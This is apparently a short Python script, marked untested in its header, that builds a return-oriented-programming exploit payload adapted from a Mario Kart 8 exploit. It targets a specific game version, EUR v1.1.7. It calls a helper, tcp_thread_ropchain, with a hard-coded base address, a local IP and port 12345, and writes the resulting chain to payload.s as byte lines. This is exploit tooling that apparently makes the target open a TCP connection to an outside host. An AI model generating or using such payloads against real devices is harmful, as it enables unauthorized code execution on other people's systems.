dcf3bf5204
Untested, copy-pasted from the Mario Kart 8 exploit (the ROP gadget addresses are meant to be used on EUR v1.1.7)
from tcp_ropchain import *
import struct
# Ask the helper module for the chain of words. tcp_thread_ropchain comes from
# tcp_ropchain, which is not shown here, so what the three arguments mean is
# defined there.
# NOTE(review): all three arguments are hard-coded literals -- presumably a
# base address, an IPv4 host given as four octets, and a TCP port; confirm
# against tcp_ropchain. The commit message marks this script as untested and
# says the gadget addresses are meant for EUR v1.1.7, so treat the generated
# file as unverified for any other build.
rop_chain = tcp_thread_ropchain(0x4D070000 + 0x14, [192, 168, 178, 89], 12345)

# Write every word of the chain to payload.s as four `byte 0x..` lines,
# most significant byte first.
with open('payload.s', 'w') as out:
    for word in rop_chain:
        # Shift each of the four bytes down in turn and mask it to 8 bits.
        octets = [hex((word >> shift) & 0xff) for shift in (24, 16, 8, 0)]
        for octet in octets:
            print('byte %s' % octet, file=out)